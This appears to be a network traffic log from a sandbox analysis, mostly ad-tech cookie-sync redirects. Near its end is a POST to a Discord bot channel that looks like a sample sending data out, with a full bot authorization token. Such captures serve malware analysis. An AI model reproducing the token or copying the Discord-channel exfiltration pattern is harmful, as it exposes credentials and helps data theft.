AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Di%26uid%3D%24USER_ID

Request

GET /csync?pid=rubicon&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dresetdigital%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Di%26uid%3D%24USER_ID HTTP/1.1
Host: sync.resetdigital.co
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Referer: https://www.se7ensins.com/
Connection: keep-alive

Response

HTTP/1.1 302 Found

location: https://s2s.t13.io/setuid?bidder=resetdigital&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&f=i&uid=000001434C5AA6D7
set-cookie: ckbk=000001434C5AA6D7; Path=/; Max-Age=7776000; Domain=resetdigital.co; SameSite=None; Secure
cache-control: no-cache, no-store, must-revalidate
content-type: text/html
accept-ranges: bytes
content-length: 0
date: Sun, 26 May 2024 02:07:01 GMT
DNS

sync.resetdigital.co

Request

sync.resetdigital.co

IN A

Response

sync.resetdigital.co

IN A

143.244.220.80

sync.resetdigital.co

IN A

138.197.63.78

sync.resetdigital.co

IN A

159.203.147.11

sync.resetdigital.co

IN A

143.244.222.249

sync.resetdigital.co

IN A

159.89.252.170

sync.resetdigital.co

IN A

165.227.251.217
DNS

sync.resetdigital.co

Request

sync.resetdigital.co

IN AAAA

Response
DNS

aax-eu.amazon-adsystem.com

Request

aax-eu.amazon-adsystem.com

IN A

Response

aax-eu.amazon-adsystem.com

IN A

67.220.224.144
GET

https://aax-eu.amazon-adsystem.com/s/iu3?cm3ppd=1&d=dtb-pub&csif=t&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&dl=n-mediagrid_n-index_n-LoopMe_n-Ogury_rx_n-MediaNet_n-Beeswax_ox-db5_smrt_n-inmobi_cnv_n-smaato_n-sharethrough_n-onetag_pm-db5_ym_rbd_ppt_n-vmg_an-db5_n-Rise_3lift

Request

GET /s/iu3?cm3ppd=1&d=dtb-pub&csif=t&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&dl=n-mediagrid_n-index_n-LoopMe_n-Ogury_rx_n-MediaNet_n-Beeswax_ox-db5_smrt_n-inmobi_cnv_n-smaato_n-sharethrough_n-onetag_pm-db5_ym_rbd_ppt_n-vmg_an-db5_n-Rise_3lift HTTP/1.1
Host: aax-eu.amazon-adsystem.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.se7ensins.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 302 Found

Server: Server
Date: Sun, 26 May 2024 02:07:01 GMT
Content-Length: 0
Connection: keep-alive
x-amz-rid: ERXBKJN792FTW1264P89
Set-Cookie: ad-id=A1dSemiFuE2kpsaF1gB-RhI|t; Domain=.amazon-adsystem.com; Expires=Wed, 01-Jan-2025 02:07:01 GMT; Path=/; Secure; HttpOnly; SameSite=None
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
p3p: policyref="https://www.amazon.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR DSP COR"
Location: https://aax-eu.amazon-adsystem.com/s/iu3?cm3ppd=1&d=dtb-pub&csif=t&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&dl=n-mediagrid_n-index_n-LoopMe_n-Ogury_rx_n-MediaNet_n-Beeswax_ox-db5_smrt_n-inmobi_cnv_n-smaato_n-sharethrough_n-onetag_pm-db5_ym_rbd_ppt_n-vmg_an-db5_n-Rise_3lift&dcc=t
Vary: Content-Type,Accept-Encoding,User-Agent
Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
GET

https://aax-eu.amazon-adsystem.com/s/iu3?cm3ppd=1&d=dtb-pub&csif=t&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&dl=n-mediagrid_n-index_n-LoopMe_n-Ogury_rx_n-MediaNet_n-Beeswax_ox-db5_smrt_n-inmobi_cnv_n-smaato_n-sharethrough_n-onetag_pm-db5_ym_rbd_ppt_n-vmg_an-db5_n-Rise_3lift&dcc=t

Request

GET /s/iu3?cm3ppd=1&d=dtb-pub&csif=t&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&dl=n-mediagrid_n-index_n-LoopMe_n-Ogury_rx_n-MediaNet_n-Beeswax_ox-db5_smrt_n-inmobi_cnv_n-smaato_n-sharethrough_n-onetag_pm-db5_ym_rbd_ppt_n-vmg_an-db5_n-Rise_3lift&dcc=t HTTP/1.1
Host: aax-eu.amazon-adsystem.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.se7ensins.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 200 OK

Server: Server
Date: Sun, 26 May 2024 02:07:01 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64
Connection: keep-alive
x-amz-rid: W2ED54MXM7RH8Y5A5D0H
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
p3p: policyref="https://www.amazon.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR DSP COR"
Vary: Content-Type,Accept-Encoding,User-Agent
Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
DNS

aax-eu.amazon-adsystem.com

Request

aax-eu.amazon-adsystem.com

IN A

Response

aax-eu.amazon-adsystem.com

IN A

54.239.33.158
DNS

aax-eu.amazon-adsystem.com

Request

aax-eu.amazon-adsystem.com

IN AAAA

Response
DNS

144.224.220.67.in-addr.arpa

Request

144.224.220.67.in-addr.arpa

IN PTR

Response
DNS

80.220.244.143.in-addr.arpa

Request

80.220.244.143.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=a501fe721b0411efaf4a92d88e6aaaae; Expires=Fri, 25-May-2029 02:07:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689224.349
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlUQn0hHGsBPN%2FKtlAM74oSOeJGQPYPT81ElBssIs4Fx%2BVupZtV7PDg5139wndTzf9HWg6SXnG00FsTsY7E6O8WA9C4DEhwP1Mau4pSLxhTzXndDb2hyMX2kSK39"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a501fe721b0411efaf4a92d88e6aaaaed9eebbba49ed7ad680a0e7dcd79053bd11891d464ebc298aaf204c2ac7284fc0; Expires=Fri, 25-May-2029 02:07:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=4d25f97fef3af6f244f01e113e05f5d626ec0337-1716689223; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=l39z94m5_Mgx8H.G23gbSFocPbEcNoccxr2K7DUS1Yg-1716689223445-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a359d486b94e1-LHR
DNS

pixels.ad.gt

Request

pixels.ad.gt

IN A

Response

pixels.ad.gt

IN CNAME

pixels.ad.gt.cdn.cloudflare.net

pixels.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

pixels.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69

pixels.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69
DNS

pixels.ad.gt

Request

pixels.ad.gt

IN A
POST

https://a.ad.gt/api/v1/collect

Request
